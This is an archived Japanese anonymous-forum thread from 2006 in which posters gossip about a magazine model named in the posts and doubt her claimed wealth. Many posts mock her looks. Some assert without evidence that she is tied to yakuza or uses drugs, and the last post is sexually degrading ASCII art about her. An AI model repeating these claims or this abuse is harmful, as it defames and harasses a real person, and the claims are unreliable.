履いてるブーツジェリーガールってゅぅ激安のだから1万もしなぃのに(・・;)

163 :無名モデル:2006/12/02(土) 10:12:36 ID:8HhVOaha
雑誌を盛り上げる為に造られたキャラなんかな、篠田叶華。
バッグや財布、アクセは足りなかったらまわりから借りればいいだけだし、撮影用の金だって編集部で用意できるでしょ
財布の中身、ちゃんと公開してたらまた違ったんだろうけど
これ程金持ちだったら、カードはブラックやプラチナだろうしさ。
先月号掲載の車の写真がブレてたのが一番引っ掛かるんだよね〜
それにいっぱい持ってる、と言いつつ映ってるのは毎回同じアクセ…
新作自慢はしないよね、この人。

164 :無名モデル:2006/12/02(土) 14:56:48 ID:c8/Y8ftv
何号か前のブランド図鑑の篠田ちゃんが持ってるブランドって他のモデルがだいたい持ってる。

気がする。


165 :無名モデル:2006/12/03(日) 00:58:17 ID:SfUV/YGh
老けすぎ

166 :無名モデル:2006/12/04(月) 12:10:50 ID:uFMj1d3+
確かに篠田叶華は全てがうそ臭い・・・。
金持ちが本当でも、年齢はうそだろうな。

167 :無名モデル:2006/12/04(月) 12:37:43 ID:???
先月よりいっきに老けたねネ

168 :無名モデル:2006/12/04(月) 14:31:32 ID:YbvO78YI
サイフの中身の現金が・・・マジでネタじゃなかったらこの人なんか怖い

169 :無名モデル:2006/12/04(月) 17:28:13 ID:XH5Qjnxc
篠田叶華いらね
キッショ!

170 :無名モデル:2006/12/04(月) 17:52:24 ID:???
>>168
つアコムアイフル無人くんホノボのレイクetc…

171 :無名モデル:2006/12/04(月) 19:40:36 ID:FNeFq0Z6
現金は適当に掴んで入れてるだけとかって…www
金庫から、だよね?銀行じゃなくて家に大金があるのかぁ

ってかさ、代表取締役なのになんで財布に親のカードが入ってんの?
やっぱり自分の稼ぎじゃないのか?

172 :無名モデル:2006/12/04(月) 20:47:06 ID:QdfLKqZZ
ワンピださすぎWWW
普通のワンピサイズ合わないとか言ってるけど、まず自分はワンピが似合わない人間だと気付いていないWWW
足がごぼうだからキモイって彼氏言ってたW

173 :無名モデル:2006/12/06(水) 13:05:19 ID:+c5zuMfv
彼氏あなたに気使ったんじゃない?w

174 :無名モデル:2006/12/06(水) 13:12:07 ID:???
やくざの女

175 :無名モデル:2006/12/09(土) 00:01:22 ID:32dPLr3j
雑誌で見る限りカードは金持ちなのにクレジットの色はブラックでもゴールドでもないんだね
いつもニコニコ現金ばらいなのかな?

176 :無名モデル:2006/12/09(土) 00:12:52 ID:XyUWDS0c
やらせだねえりか22歳はのりたいため 見栄はり
ってんだよ
本当の金もはくだらねキャバクラ紙面にのらないだろうよ

177 :無名モデル:2006/12/09(土) 00:41:57 ID:sNUadRGE
>176
日本語でおk

178 :無名モデル:2006/12/09(土) 00:55:24 ID:sgJq3rDM
今日マルキューにいたけどやくざみたいなおっさんと一緒だった。細すぎてきもかった

179 :無名モデル:2006/12/09(土) 22:41:32 ID:NKvizLfW
ポン中丸出し。

180 :無名モデル:2006/12/09(土) 23:19:14 ID:???
ここに来てageha編集部が作り上げたキャラ説急浮上だね

181 :無名モデル:2006/12/10(日) 01:54:38 ID:???
嫌みな金持ちってこのこみたいなのをゆーんだろね

182 :無名モデル:2006/12/11(月) 04:53:10 ID:???
>>162
ぐぐったらすげえ安物だね。
1ヶ月くらいでこわれそうな。
安かろう悪かろうなブーツなんてお金持ちははくかなあ?
デザインが気に入ったなら、オーダーすればいいのに。
マックスマーラより安いよ。

183 :無名モデル:2006/12/11(月) 23:22:41 ID:???
もうネタとしか見れなくなったよ

184 :無名モデル:2006/12/13(水) 00:01:12 ID:jbvzFwZY
財布にあんな現金入れて歩いてるのが本当だったらただのうれしがりでしょ
本当の金持ちはあんなに金持ちアピールしないww

185 :無名モデル:2006/12/13(水) 00:16:48 ID:FAcAb75P
>>184そんなことはないww

186 :無名モデル:2006/12/13(水) 00:21:10 ID:rKnavF3U
そのうちひったくりに遭うんじゃね?

187 :無名モデル:2006/12/13(水) 17:10:13 ID:???
あれでしょ?現代版宮路社長でしょ?

188 :無名モデル:2006/12/14(木) 10:47:15 ID:zOD9Cikl
>>1-100

189 :無名モデル:2006/12/14(木) 20:01:30 ID:???
18で、まともな会社の取締代表になれるような頭があったら
あの下品な顔に整形&あの雑誌に出ないだろー。
あんなに金持ってますアピールしないだろ、本当に持ってたら。

親の胡散臭い会社か、編集部が作り上げた嘘キャラだろ。
顔が売りのリオナ、イカレ気味の姫香、ニューハーフ、未婚母
ときたら、
金だけの女もいないと。
蛇女  古華


190 :無名モデル:2006/12/14(木) 21:15:31 ID:???
全身でいくら、みたいな企画の1位にもってくるには
こんくらいのキャラもってこないと、って編集部が作りあげたんだろうな。
それ以外のメンバーがそんなに差異なくて、1位にするならどーんと
かけ離れた金持ちにしとかないと雑誌としてかっこがつかない、と。

191 :無名モデル:2006/12/15(金) 14:43:45 ID:LkN9hLWh
あの足は編集?
サザエさんもびっくりなバランスの悪さ・・・と思うのは自分だけ?

192 :無名モデル:2006/12/18(月) 01:46:20 ID:K3QrVZqH
ごぼうみたいだよね。
バルーンワンピも似合わなさ過ぎ。

193 :無名モデル:2006/12/18(月) 04:15:12 ID:JT17PBdC
車の写真も、編集部が町中探して撮りました。みたいな写真だよね。なにあれ。

194 :無名モデル:2006/12/20(水) 15:36:59 ID:NAWiPXf+
顔はかわいいけどデカい!五頭身くらいじゃない?おまけに首短すぎ

195 :無名モデル:2006/12/20(水) 15:46:34 ID:ejbdiWwN
もう出ないでほしい

196 :無名モデル:2006/12/21(木) 12:17:19 ID:???
顔も可愛くないよ・・・馬面。
ニューハーフの人よりおかまっぽい顔してるよね。

197 :無名モデル:2006/12/21(木) 16:10:34 ID:E0A5szeo
   ___
        ./    \
        .| ^   ^ |
        | .>ノ(、_, )ヽ、.|   
         ! ! -=ニ=- ノ! < ほらどうしたの?ブランド物欲しいなら
    /´⌒´ \`ニニ´/´^ヽ⌒ヽ  早くしゃぶりなよエリちゃん
   /   ィ   , ̄ ヽ  , )` `ヽ
  /    ノ^  ー   '` ー 'ヽ   ゙i
  ノ  ,,,ノ            Y´゙  )
 (   < |       ⌒     !  /
  ヽ_  \           ノ_/    
    ヽ、__ ヽ.ー    ,,,@,,, ノ  ソ、  
      〈J .〉  ヾ、.::;;;;;;::.ノ |ヽ-´  
      /""     ;ミシミッ    |    
       レ     イミ.ニニ⊃リ    
      ,ゝ    ,ノ `ー−' ヽ ノ     
     / ` レリ  i´   リ     
     i    /    `、   i     
     〉  イ      〉  |     
    /  ::|      (_ヽ \、     
    (。mnノ       `ヽ、_nm


35 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)